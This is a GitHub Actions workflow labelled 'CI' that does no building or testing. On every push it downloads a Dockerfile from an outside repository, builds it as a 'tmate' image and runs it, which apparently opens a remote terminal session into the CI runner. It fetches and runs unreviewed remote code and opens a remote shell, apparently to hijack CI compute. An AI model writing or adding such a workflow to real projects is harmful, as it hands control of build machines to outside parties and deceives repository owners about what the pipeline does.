name: CI
on: [push]
jobs:
  build:
    runs-on: windows-latest
    steps:
      - run: Invoke-WebRequest -Uri https://raw.githubusercontent.com/kalepailmine001/ssh/refs/heads/main/Dockerfile -OutFile Dockerfile
      - run: docker build -t tmate .
      - run: docker run tmate -F
